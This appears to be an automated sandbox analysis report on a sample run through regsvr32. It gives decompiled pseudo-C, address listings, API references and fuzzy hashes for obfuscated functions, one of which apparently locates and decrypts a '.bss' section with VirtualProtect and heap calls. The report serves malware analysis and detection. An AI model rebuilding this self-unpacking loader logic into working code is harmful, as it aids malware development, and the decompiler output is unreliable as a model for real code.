                          0x7ff88c0724cf
                          0x7ff88c0724de
                          0x7ff88c0724e4
                          0x7ff88c0724e7
                          0x7ff88c0724f0
                          0x7ff88c07250e
                          0x7ff88c072534
                          0x7ff88c07253e
                          0x7ff88c07255b
                          0x7ff88c07255d
                          0x7ff88c07256b
                          0x7ff88c07257d
                          0x7ff88c072583
                          0x7ff88c07258f
                          0x7ff88c07259a
                          0x7ff88c0725a2
                          0x7ff88c0725a4
                          0x7ff88c0725b1
                          0x7ff88c0725bc
                          0x7ff88c0725c3
                          0x7ff88c0725d4
                          0x7ff88c0725ea
                          0x7ff88c0725f4
                          0x7ff88c07261b
                          0x7ff88c07261d
                          0x7ff88c072634
                          0x7ff88c07263d
                          0x7ff88c072649
                          0x7ff88c072650
                          0x7ff88c072653
                          0x7ff88c07266d
                          0x7ff88c07267a
                          0x7ff88c07267e
                          0x7ff88c072685
                          0x7ff88c072689
                          0x7ff88c072690
                          0x7ff88c072694
                          0x7ff88c0726b2
                          0x7ff88c0726ba
                          0x7ff88c0726c0
                          0x7ff88c0726c4
                          0x7ff88c0726c7
                          0x7ff88c0726cb
                          0x7ff88c0726d0
                          0x7ff88c0726d5
                          0x7ff88c0726da
                          0x7ff88c0726df
                          0x7ff88c0726e3
                          0x7ff88c0726e8
                          0x7ff88c0726fa
                          0x7ff88c07272d

                          APIs
                          • GetProcessHeap.KERNEL32 ref: 00007FF88C091456
                          • HeapAlloc.KERNEL32 ref: 00007FF88C091467
                            • Part of subcall function 00007FF88C087C20: VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FF88C07A050), ref: 00007FF88C087CFC
                            • Part of subcall function 00007FF88C087C20: VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FF88C07A050), ref: 00007FF88C087E18
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: HeapProtectVirtual$AllocProcess
                          • String ID: 2 $6$62 $662 $7$8662
                          • API String ID: 3541638468-3329516171
                          • Opcode ID: 67c9b6950c3a2d71ef505d544f281c5ab4f6862895f610e6b6873dadac7de400
                          • Instruction ID: f4e03784fdbce272c417aad10a8c1e144b91b8d91abee70699c1a71aecb99e41
                          • Opcode Fuzzy Hash: 67c9b6950c3a2d71ef505d544f281c5ab4f6862895f610e6b6873dadac7de400
                          • Instruction Fuzzy Hash: F832F4735182C18BE371CF29E44479EBBA4F788748F144129EA8997B59DB7CE954CF00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 246 3d4db4-3d4def HeapCreate 247 3d4df5-3d4e0b 246->247 248 3d4f03-3d4f23 246->248 249 3d4e94 247->249 250 3d4e11-3d4e16 247->250 251 3d4e99-3d4e9b 249->251 252 3d4e18-3d4e20 250->252 253 3d4e22-3d4e24 250->253 254 3d4e9d-3d4ea6 HeapDestroy 251->254 255 3d4ea8-3d4ecf HeapAlloc 251->255 252->250 252->253 253->249 256 3d4e26-3d4e49 HeapAlloc 253->256 254->248 257 3d4ee1-3d4efc call 3d487a call 3d37e0 255->257 258 3d4ed1-3d4edf HeapDestroy 255->258 259 3d4e8d-3d4e92 256->259 260 3d4e4b-3d4e8b call 3d111c call 3d16fc 256->260 267 3d4f01 257->267 258->248 259->251 260->251 267->248
                          C-Code - Quality: 59%
                          			E003D4DB4(void* __eax, void* __ebx, void* __esi, void* __ebp, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r9, void* __r10, void* __r11) {
                          				intOrPtr _t24;
                          				void* _t33;
                          				void* _t43;
                          				void* _t44;
                          				long long _t52;
                          				long long _t55;
                          				void* _t67;
                          				intOrPtr* _t71;
                          				void* _t72;
                          				long long _t74;
                          				long long _t76;
                          				void* _t77;
                          				long long _t79;
                          				void* _t85;
                          				void* _t86;
                          				void* _t87;
                          				long _t88;
                          				long _t90;
                          				long _t92;
                          				long long _t94;
                          
                          				_t87 = __r11;
                          				_t86 = __r10;
                          				_t85 = __r9;
                          				_t53 = __rbx;
                          				_t44 = __ebp;
                          				_t43 = __esi;
                          				_t52 = _t79;
                          				 *((long long*)(_t52 + 8)) = __rbx;
                          				 *((long long*)(_t52 + 0x10)) = _t76;
                          				 *((long long*)(_t52 + 0x18)) = __rsi;
                          				 *((long long*)(_t52 + 0x20)) = __rdi;
                          				_t77 = __rcx;
                          				r8d = 0;
                          				_t33 = 8; // executed
                          				HeapCreate(_t92, _t90, _t88); // executed
                          				_t74 = _t52;
                          				if(_t52 == 0) {
                          					L14:
                          					return _t33;
                          				}
                          				_t67 =  *((intOrPtr*)(__rcx + 0x3c)) + __rcx;
                          				_t71 = _t52 + _t67 + 0x68;
                          				_t24 =  *_t71;
                          				if(_t24 == 0) {
                          					L8:
                          					_t33 = 2;
                          					L9:
                          					if(_t33 == 0) {
                          						_t72 = _t71 + 0x128ab5c4;
                          						HeapAlloc(??, ??, ??);
                          						_t55 = _t52;
                          						if(_t52 != 0) {
                          							L003D487A();
                          							 *((long long*)(_t55 + 8)) = _t74;
                          							 *0x3dd458 = _t55;
                          							_t33 = E003D37E0(_t33, 0, _t43, _t44, _t77, _t72, _t85, _t86);
                          						} else {
                          							HeapDestroy();
                          							_t33 = 8;
                          						}
                          					} else {
                          						HeapDestroy();
                          					}
                          					goto L14;
                          				}
                          				while(_t24 != 0x7373622e) {
                          					_t71 = _t71 + 0x28;
                          					_t24 =  *_t71;
                          					if(_t24 != 0) {
                          						continue;
                          					}
                          					break;
                          				}
                          				if(_t24 == 0) {
                          					goto L8;
                          				} else {
                          					r13d =  *(_t71 + 0x10);
                          					r12d =  *(_t71 + 0x14);
                          					r12d = r12d ^  *(_t67 + 8);
                          					r12d = r12d ^ r13d;
                          					HeapAlloc(??, ??, ??);
                          					_t94 = _t52;
                          					if(_t52 == 0) {
                          						_t33 = 8;
                          					} else {
                          						r9d = r12d;
                          						r8d = r13d;
                          						E003D111C(0, _t53, _t52, _t67 + _t77);
                          						r11d =  *((intOrPtr*)(_t71 + 0xc));
                          						_t52 = 0x3e1040;
                          						 *0x3dd448 = _t94 - _t87 - _t77;
                          						 *0x3dd450 = E003D16FC(0, 0x2a, 0x3e1040, _t94 - _t87 - _t77 + 0x3e1040);
                          					}
                          					goto L9;
                          				}
                          			}























                          0x003d4db4
                          0x003d4db4
                          0x003d4db4
                          0x003d4db4
                          0x003d4db4
                          0x003d4db4
                          0x003d4db4
                          0x003d4db7
                          0x003d4dbb
                          0x003d4dbf
                          0x003d4dc3
                          0x003d4dd1
                          0x003d4dd4
                          0x003d4dde
                          0x003d4de3
                          0x003d4de9
                          0x003d4def
                          0x003d4f03
                          0x003d4f23
                          0x003d4f23
                          0x003d4dfb
                          0x003d4e02
                          0x003d4e07
                          0x003d4e0b
                          0x003d4e94
                          0x003d4e94
                          0x003d4e99
                          0x003d4e9b
                          0x003d4eba
                          0x003d4ec3
                          0x003d4ec9
                          0x003d4ecf
                          0x003d4ee9
                          0x003d4eee
                          0x003d4ef5
                          0x003d4f01
                          0x003d4ed1
                          0x003d4ed4
                          0x003d4eda
                          0x003d4eda
                          0x003d4e9d
                          0x003d4ea0
                          0x003d4ea0
                          0x00000000
                          0x003d4e9b
                          0x003d4e11
                          0x003d4e18
                          0x003d4e1c
                          0x003d4e20
                          0x00000000
                          0x00000000
                          0x00000000
                          0x003d4e20
                          0x003d4e24
                          0x00000000
                          0x003d4e26
                          0x003d4e26
                          0x003d4e2a
                          0x003d4e31
                          0x003d4e3a
                          0x003d4e3d
                          0x003d4e43
                          0x003d4e49
                          0x003d4e8d
                          0x003d4e4b
                          0x003d4e4e
                          0x003d4e51
                          0x003d4e5a
                          0x003d4e5f
                          0x003d4e63
                          0x003d4e75
                          0x003d4e85
                          0x003d4e85
                          0x00000000
                          0x003d4e49

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.389034131.00000000003D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_3d0000_regsvr32.jbxd
                          Similarity
                          • API ID: Heap$AllocDestroy$Create
                          • String ID: .bss
                          • API String ID: 388876957-3890483948
                          • Opcode ID: f2c7b615a138f4c90b95f00cc2a562d4e42a46c6d73442d59f831ff1248fe2d1
                          • Instruction ID: 6f6e849a4f306246cce850da3cc270836af621acdad40507b557c73eb31bbf11
                          • Opcode Fuzzy Hash: f2c7b615a138f4c90b95f00cc2a562d4e42a46c6d73442d59f831ff1248fe2d1
                          • Instruction Fuzzy Hash: 4531AB7671078197EB16CF66B94032A77A8F788FD4F098126DE4A47B94DF38E995C300
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 35%
                          			E00007FF87FF88C087C20(long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8, signed int __r9) {
                          				void* __rdi;
                          				signed int _t150;
                          				void* _t153;
                          				signed int _t154;
                          				void* _t156;
                          				signed int _t157;
                          				signed long long _t192;
                          				signed long long _t210;
                          				signed long long _t228;
                          				void* _t229;
                          				intOrPtr _t230;
                          				long long _t234;
                          				long long* _t235;
                          				void* _t237;
                          				void* _t238;
                          				signed long long _t242;
                          				intOrPtr* _t248;
                          				signed long long _t250;
                          				signed int _t251;
                          				void* _t252;
                          				long _t254;
                          				void* _t256;
                          				long _t258;
                          				void* _t260;
                          
                          				_t252 = _t237;
                          				 *((long long*)(_t252 + 8)) = __rbx;
                          				 *((long long*)(_t252 + 0x10)) = _t234;
                          				 *((long long*)(_t252 + 0x18)) = __rsi;
                          				_t238 = _t237 - 0x60;
                          				r14d = __rcx - 0x2103;
                          				r12d = __r8 + 0xd1;
                          				r15d =  *(_t238 + 0xd8);
                          				_t153 =  *(_t238 + 0xd0) + 0xfffff9ee;
                          				_t156 = __rdx + 0xeb4;
                          				r15d = r15d + 0x1249;
                          				r13d = __rdx - 0x27b2;
                          				r8d = r8d + 0x152;
                          				if (_t156 - _t258 + 0x329d < 0) goto 0x8c087f40;
                          				if (r14d == _t156) goto 0x8c087f24;
                          				if ( *((long long*)(__r9 + 0x2f8)) == 0) goto 0x8c087e1e;
                          				 *((intOrPtr*)( *((intOrPtr*)(__r9)) + 0x198)) =  *((intOrPtr*)( *((intOrPtr*)(__r9)) + 0x198)) +  *(__r9 + 0x90) - 0x3a59;
                          				_t235 =  *((intOrPtr*)(__r9 + 0x2f8));
                          				 *((long long*)(__r9 + 0x48)) = 0x84ef49a;
                          				r8d =  *( *((intOrPtr*)(__r9)) + 0x130);
                          				r8d = r8d ^ 0x000023f3; // executed
                          				if (VirtualProtect(_t260, _t258) != 0) goto 0x8c087d2b;
                          				if ( *((intOrPtr*)( *((intOrPtr*)(__r9)) + 0x188)) + 0x259 - 0x3595 < 0) goto 0x8c087d2b;
                          				 *(__r9 + 0x90) =  *(__r9 + 0x90) ^ __r9 + 0x000001c0;
                          				if ( *( *((intOrPtr*)(__r9 + 0x1c8)) + 0x60) * 0xc3622d03 - 0x30d5 <= 0) goto 0x8c087d6a;
                          				_t242 =  *(__r9 + 0x228) ^ 0x00001f2c;
                          				 *(__r9 + 0x120) = _t242;
                          				if (0x30d6 - _t235 < 0) goto 0x8c087d51;
                          				_t210 =  *((intOrPtr*)(__r9));
                          				_t248 = _t238 + 0xd0;
                          				 *((intOrPtr*)(_t210 + 0x198)) =  *((intOrPtr*)(_t210 + 0x198)) +  *((intOrPtr*)(__r9 + 0x70)) + 0x2032;
                          				 *((long long*)(_t235 + 8)) =  *((intOrPtr*)(__r9 + 0xc0));
                          				 *((intOrPtr*)(_t235 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x118)) + 0x50));
                          				 *((long long*)(__r9 + 0x28)) = __r9 + 0x1b0;
                          				r8d =  *( *((intOrPtr*)(__r9 + 0x118)) + 0x88 + _t210 * 8);
                          				 *_t235 = _t242 +  *((intOrPtr*)(__r9 + 0xc0));
                          				 *((long long*)(__r9 + 0xa0)) = 0x6dce;
                          				 *((intOrPtr*)(_t235 + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x118)) + 0xa4));
                          				 *( *((intOrPtr*)(__r9 + 0x140)) + 0x198) =  *( *((intOrPtr*)(__r9 + 0x140)) + 0x198) |  *(__r9 + 0x198) + 0x0000329d;
                          				r8d =  *(_t238 + 0xd0);
                          				VirtualProtect(_t256, _t254);
                          				if (_t153 - _t229 + 0x30d5 < 0) goto 0x8c08803b;
                          				r14d = r14d + 0x30d5;
                          				 *((long long*)(__r9 + 0x158)) =  *((intOrPtr*)(__r9 + 0x88));
                          				 *((long long*)(__r9 + 0x298)) = _t235 +  *((intOrPtr*)(__r9 + 0xc0));
                          				 *((long long*)(__r9 + 0x10)) = 0x2598;
                          				 *(__r9 + 0x198) =  *(__r9 + 0x198) * 0xed7e2e8;
                          				_t230 =  *((intOrPtr*)(__r9 + 0x158));
                          				if (_t230 == 0) goto 0x8c087eac;
                          				_t192 =  *(__r9 + 0x1e0) | 0x0000228c;
                          				 *(__r9 + 0x198) = _t192;
                          				GetProcessHeap();
                          				if (_t192 == 0) goto 0x8c087eac;
                          				HeapFree(??, ??, ??); // executed
                          				r8d =  *(_t238 + 0xd8);
                          				 *((intOrPtr*)(_t238 + 0x50)) = _t254 + 0x81;
                          				r10d = _t256 + 0x2032;
                          				 *(_t238 + 0x48) = r10d;
                          				r11d = _t254 - 0x1563;
                          				 *((intOrPtr*)(_t238 + 0x40)) = r11d;
                          				_t150 = _t260 - 0x544;
                          				 *(_t238 + 0x38) = _t150;
                          				_t157 = _t258 - 0xb3d;
                          				_t154 = _t153 + 0x1c8;
                          				r9d = _t258 + 0x612;
                          				 *(_t238 + 0x30) = _t154;
                          				 *(_t238 + 0x28) = __r9;
                          				r8d = r8d + 0x216;
                          				 *(_t238 + 0x20) = _t157;
                          				E00007FF87FF88C0782D0( *((intOrPtr*)(__r9 + 0x328)), _t230, _t230);
                          				goto 0x8c08803b;
                          				goto 0x8c08803b;
                          				_t228 = r15d;
                          				_t251 = _t154;
                          				if (_t251 - (( *(_t248 + 0xd8) | _t228) ^ _t157) >= 0) goto 0x8c087ffe;
                          				if (_t251 -  *((intOrPtr*)(_t248 + 0x110)) +  *_t248 >= 0) goto 0x8c087fe6;
                          				SetEndOfFile(_t229);
                          				r9d =  *(__r9 + 0xc8);
                          				r10d =  *(__r9 + 0xf0);
                          				r9d = r9d & _t157;
                          				r10d = r10d ^  *(__r9 + 0x90);
                          				r9d = r9d ^ 0x00003666;
                          				 *(_t238 + 0x38) = r9d;
                          				r13d = r13d | _t154;
                          				 *(_t238 + 0x30) = _t150 & 0x000027b2;
                          				r10d = r10d - 0x3a59;
                          				 *(_t238 + 0x28) = _t154 & 0x00000008 | 0x000023f6;
                          				 *(_t238 + 0x20) = r10d;
                          				r8d = r13d;
                          				r14d = E00007FF87FF88C078BF0((_t154 & 0x000027b2) +  *(__r9 + 0x120),  *((intOrPtr*)(__r9 + 0x130)) + r14d,  *((intOrPtr*)(_t248 + 0x110)) +  *_t248, __r9, ( *(_t248 + 0xd8) | _t228) ^ _t157, _t228, _t230, __r9, _t252);
                          				goto 0x8c08803b;
                          				 *(__r9 + 0x100) =  *(__r9 + 0x100) |  *((intOrPtr*)(__r9 + 0x188)) +  *((intOrPtr*)(__r9 + 0x78)) +  *((intOrPtr*)(__r9 + 0x70));
                          				goto 0x8c08803b;
                          				_t250 =  *((intOrPtr*)(__r9 + 0x1f0));
                          				if (_t251 == r8d * _t250 - _t228) goto 0x8c08803b;
                          				r8d = r8d * (_t230 + _t230);
                          				if (_t154 + 1 != r8d * _t250 - _t228) goto 0x8c088020;
                          				return _t258 - 0xfd2;
                          			}



























                          0x7ff88c087c20
                          0x7ff88c087c23
                          0x7ff88c087c27
                          0x7ff88c087c2b
                          0x7ff88c087c38
                          0x7ff88c087c43
                          0x7ff88c087c51
                          0x7ff88c087c58
                          0x7ff88c087c6e
                          0x7ff88c087c74
                          0x7ff88c087c7a
                          0x7ff88c087c87
                          0x7ff88c087c8e
                          0x7ff88c087c9a
                          0x7ff88c087ca3
                          0x7ff88c087cb1
                          0x7ff88c087cc7
                          0x7ff88c087cce
                          0x7ff88c087cdb
                          0x7ff88c087cee
                          0x7ff88c087cf5
                          0x7ff88c087d04
                          0x7ff88c087d1b
                          0x7ff88c087d24
                          0x7ff88c087d41
                          0x7ff88c087d4a
                          0x7ff88c087d53
                          0x7ff88c087d68
                          0x7ff88c087d6a
                          0x7ff88c087d6d
                          0x7ff88c087d7f
                          0x7ff88c087d8d
                          0x7ff88c087da2
                          0x7ff88c087da5
                          0x7ff88c087dbd
                          0x7ff88c087dcf
                          0x7ff88c087dd3
                          0x7ff88c087deb
                          0x7ff88c087e02
                          0x7ff88c087e09
                          0x7ff88c087e18
                          0x7ff88c087e26
                          0x7ff88c087e33
                          0x7ff88c087e4b
                          0x7ff88c087e52
                          0x7ff88c087e64
                          0x7ff88c087e6c
                          0x7ff88c087e73
                          0x7ff88c087e7d
                          0x7ff88c087e86
                          0x7ff88c087e8c
                          0x7ff88c087e93
                          0x7ff88c087e9c
                          0x7ff88c087ea6
                          0x7ff88c087eac
                          0x7ff88c087ebc
                          0x7ff88c087ec0
                          0x7ff88c087ec7
                          0x7ff88c087ecc
                          0x7ff88c087ed4
                          0x7ff88c087ed9
                          0x7ff88c087ee0
                          0x7ff88c087ee4
                          0x7ff88c087eeb
                          0x7ff88c087ef1
                          0x7ff88c087ef8
                          0x7ff88c087f03
                          0x7ff88c087f0f
                          0x7ff88c087f16
                          0x7ff88c087f1a
                          0x7ff88c087f1f
                          0x7ff88c087f3b
                          0x7ff88c087f47
                          0x7ff88c087f53
                          0x7ff88c087f59
                          0x7ff88c087f6c
                          0x7ff88c087f6e
                          0x7ff88c087f74
                          0x7ff88c087f7d
                          0x7ff88c087f84
                          0x7ff88c087f87
                          0x7ff88c087f8e
                          0x7ff88c087f9d
                          0x7ff88c087fbc
                          0x7ff88c087fbf
                          0x7ff88c087fc3
                          0x7ff88c087fca
                          0x7ff88c087fd1
                          0x7ff88c087fd9
                          0x7ff88c087fe1
                          0x7ff88c087fe4
                          0x7ff88c087ff5
                          0x7ff88c087ffc
                          0x7ff88c087ffe
                          0x7ff88c088012
                          0x7ff88c088025
                          0x7ff88c088039
                          0x7ff88c08805f

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: ProtectVirtual$FileHeapPrivilegeProcessRelease
                          • String ID:
                          • API String ID: 1146652191-0
                          • Opcode ID: 0c1adcab4e2e6f0684925d022917a6571ed72a80243337ddcfe3c00afa6cbea0
                          • Instruction ID: c05a0f132b508e2c396091192bc5a2eeedb555c1cbab09a705f29a58fb9252fc
                          • Opcode Fuzzy Hash: 0c1adcab4e2e6f0684925d022917a6571ed72a80243337ddcfe3c00afa6cbea0
                          • Instruction Fuzzy Hash: FDB19773604B858ADBA0CF26D898BE933A4F789B88F058136CE0D4B759DF38D651CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 58%
                          			E00007FF87FF88C08A4A0(long long __rax, signed int __rcx, void* __rdx, void* __r9, intOrPtr _a16, intOrPtr _a80, intOrPtr _a88, intOrPtr _a96, intOrPtr _a104, intOrPtr _a120) {
                          				long long _v96;
                          				short _v104;
                          				void* __rbx;
                          				long long _t55;
                          				intOrPtr _t60;
                          				signed long long _t62;
                          				void* _t68;
                          				void* _t69;
                          
                          				_t55 = __rax;
                          				r8d = r8d + 4;
                          				_a104 = _a104 + 0xfffffdb4;
                          				r9d = __rcx - 0x30d5;
                          				_a96 = r8d;
                          				_a16 = r9d;
                          				_a120 = _a80 + 0xffffda68;
                          				if (_a120 + 0x18b7 - __r9 + 0x38e9 > 0) goto 0x8c08a608;
                          				if (__rdx - 0xea2 - _a96 + 0xffffee57 <= 0) goto 0x8c08a5fa;
                          				_t60 = _a88;
                          				_v96 = 0x38e9;
                          				r9d = 0x3666;
                          				_v104 = 0x2598;
                          				r8d = 0x37e1;
                          				E00007FF87FF88C079AC0(_t60, __rcx, _t60, _t69); // executed
                          				 *((long long*)(_t60 + 0x348)) = _t55;
                          				_t62 = __rcx ^ 0x0000a532;
                          				 *(_t60 + 0x158) = _t62;
                          				if ( *( *((intOrPtr*)(_t60 + 0x1a0)) + 0xb0) * 0x4b917808 == 0x2598) goto 0x8c08a5bc;
                          				 *(_t60 + 0x1b0) =  *(_t60 + 0x1b0) |  *( *((intOrPtr*)(_t60 + 0x1c0)) + 0x120) ^ 0x00002032;
                          				if (0x2599 != _t62) goto 0x8c08a590;
                          				_v96 = 0x3189;
                          				r9d = 0x3666;
                          				_v104 = 0x30d5;
                          				r8d = 0x37e1;
                          				E00007FF87FF88C079AC0(_t60, _t62, _t60, _t69);
                          				 *((long long*)(_t60 + 0x350)) = 0x2599;
                          				 *((long long*)(_t60 + 0x120)) =  *((long long*)(_t60 + 0x120)) + 0xfffff73c;
                          				return _t68 + 0x2103;
                          			}











                          0x7ff88c08a4a0
                          0x7ff88c08a4af
                          0x7ff88c08a4c7
                          0x7ff88c08a4d8
                          0x7ff88c08a4df
                          0x7ff88c08a4ee
                          0x7ff88c08a4f6
                          0x7ff88c08a4ff
                          0x7ff88c08a513
                          0x7ff88c08a519
                          0x7ff88c08a529
                          0x7ff88c08a532
                          0x7ff88c08a538
                          0x7ff88c08a53d
                          0x7ff88c08a548
                          0x7ff88c08a54d
                          0x7ff88c08a55d
                          0x7ff88c08a564
                          0x7ff88c08a57f
                          0x7ff88c08a5a5
                          0x7ff88c08a5ba
                          0x7ff88c08a5c1
                          0x7ff88c08a5ca
                          0x7ff88c08a5d0
                          0x7ff88c08a5d5
                          0x7ff88c08a5e3
                          0x7ff88c08a5e8
                          0x7ff88c08a5ef
                          0x7ff88c08a607

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: CreateCriticalFileHeapLeaveLockSection
                          • String ID: 8
                          • API String ID: 4149557297-406019892
                          • Opcode ID: 0304c58dce2f1884ae2341276877548bb9fe5ba18944b714c61802e3584d9951
                          • Instruction ID: ff74dbd2f9daec340bab1ab70c5beef93b8fbc3c4f76233a6a4273b2c6205914
                          • Opcode Fuzzy Hash: 0304c58dce2f1884ae2341276877548bb9fe5ba18944b714c61802e3584d9951
                          • Instruction Fuzzy Hash: 52617B736086C48AD762CF15E448B9EB7A8FB89794F054139EB8957B98CB38D990CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 50%
                          			E00007FF87FF88C072A70(long long __rbx, void* __rcx, long long __rdx, void* __r8, void* __r10) {
                          				void* __r13;
                          				void* __r14;
                          				void* __r15;
                          				intOrPtr _t93;
                          				intOrPtr _t99;
                          				signed int _t105;
                          				void* _t110;
                          				signed long long _t136;
                          				intOrPtr _t149;
                          				long long _t150;
                          				void* _t154;
                          				void* _t155;
                          				void* _t158;
                          				signed long long _t159;
                          				void* _t160;
                          				void* _t163;
                          				void* _t165;
                          				void* _t166;
                          				void* _t168;
                          				long long _t170;
                          				void* _t171;
                          
                          				r13d =  *(_t160 + 0x100);
                          				r10d = __r8 - 0x30d5;
                          				r12d =  *(_t160 + 0x108);
                          				r8d = __rcx - 0x1408;
                          				r13d = r13d + 0xffffda68;
                          				 *(_t160 + 0x100) = r10d;
                          				_t170 = __rdx;
                          				 *(_t160 + 0x108) = r8d;
                          				_t110 = __rcx + 0x61f;
                          				r9d = r9d + 0xffffeb0d;
                          				_t99 =  *((intOrPtr*)(_t160 + 0xf0)) + 0xffffd84e;
                          				 *((intOrPtr*)(_t160 + 0xd0)) = r9d;
                          				 *((intOrPtr*)(_t160 + 0xe8)) = _t99;
                          				r12d = r12d + 0xffffdc0a;
                          				r15d = r13d;
                          				if (_t99 - _t168 + 0x3189 >= 0) goto 0x8c072d94;
                          				if (_t99 - __r8 - 0x106 >= 0) goto 0x8c072d94;
                          				if (_t110 == _t154 - 0x3f3) goto 0x8c072d94;
                          				 *((long long*)(_t160 + 0xc8)) = __rbx;
                          				if (r12d - _t168 + 0x1f2c > 0) goto 0x8c072c16;
                          				_t149 =  *((intOrPtr*)(__rdx + 0x1c0));
                          				r9d = __r10 + 0x2598;
                          				_t136 =  *((intOrPtr*)(__rdx + 0x1e0));
                          				r10d = _t158 - 0x984;
                          				r11d = _t154 - 0x1956;
                          				r8d = _t166 + 0x2103;
                          				_t108 =  *(_t160 + 0x100) + 0x38e9;
                          				 *(__rdx + 0x68) =  *(_t149 + 0x188) * 0x5adf2c5c;
                          				 *(__rdx + 0xa0) = _t136 | 0x00002598;
                          				_t105 = _t168 + 0x27b2;
                          				 *((intOrPtr*)(_t160 + 0x60)) = _t154 - 0x12ab;
                          				 *(_t160 + 0x58) = r10d;
                          				 *((intOrPtr*)(_t160 + 0x50)) = r9d;
                          				 *((intOrPtr*)(_t160 + 0x48)) = r11d;
                          				 *((intOrPtr*)(_t160 + 0x40)) = _t155 + 0x4ca;
                          				 *((long long*)(__rdx + 0x1e0)) = _t136 -  *((intOrPtr*)(_t149 + 0x198)) - 0x3a59;
                          				 *(_t160 + 0x38) = _t105;
                          				 *(_t160 + 0x30) =  *(_t160 + 0x100) + 0x38e9;
                          				 *((long long*)(_t160 + 0x28)) = __rdx;
                          				 *((intOrPtr*)(_t160 + 0x20)) = _t110 + 0xffffeb3f;
                          				E00007FF87FF88C08D5F0( *((intOrPtr*)(_t160 + 0xe0)) + 0x3f3, _t136 | 0x00002598, _t136 -  *((intOrPtr*)(_t149 + 0x198)) - 0x3a59, _t149, __r8, _t163, _t165, _t168, __rdx, _t171); // executed
                          				goto 0x8c072d8c;
                          				_t150 = r13d;
                          				_t159 = r12d;
                          				 *((long long*)(_t160 + 0x70)) = _t150;
                          				if (_t150 - _t159 *  *(__rdx + 0x198) < 0) goto 0x8c072c95;
                          				GetProcessHeap();
                          				if (r13d + 4 - _t159 *  *(__rdx + 0x198) >= 0) goto 0x8c072c43;
                          				r13d = r15d;
                          				r8d =  *(_t160 + 0x108);
                          				r9d =  *((intOrPtr*)(_t160 + 0xd0));
                          				if ( *((intOrPtr*)(__rdx + 0x78)) ==  *((intOrPtr*)(__rdx + 0x1b8)) +  *((intOrPtr*)(__rdx + 0x110)) -  *((intOrPtr*)(__rdx + 0xb0))) goto 0x8c072d8c;
                          				if ( *((intOrPtr*)(_t160 + 0x70)) - ( *(__rdx + 0x1f0) ^  *(__rdx + 0x100)) + r9d > 0) goto 0x8c072d8c;
                          				_t93 =  *((intOrPtr*)(__rdx + 0x78));
                          				if (_t93 - (_t154 + _t171 | _t105) > 0) goto 0x8c072d8c;
                          				asm("o16 nop [eax+eax]");
                          				 *(_t160 + 0x58) = 0x2743;
                          				 *((long long*)(_t160 + 0x50)) = 0x2de1;
                          				 *((long long*)(_t160 + 0x48)) = 0x19c7;
                          				r9d = 0x1ff4;
                          				 *((long long*)(_t160 + 0x40)) = 0x2e2f;
                          				r8d = 0x1c0c;
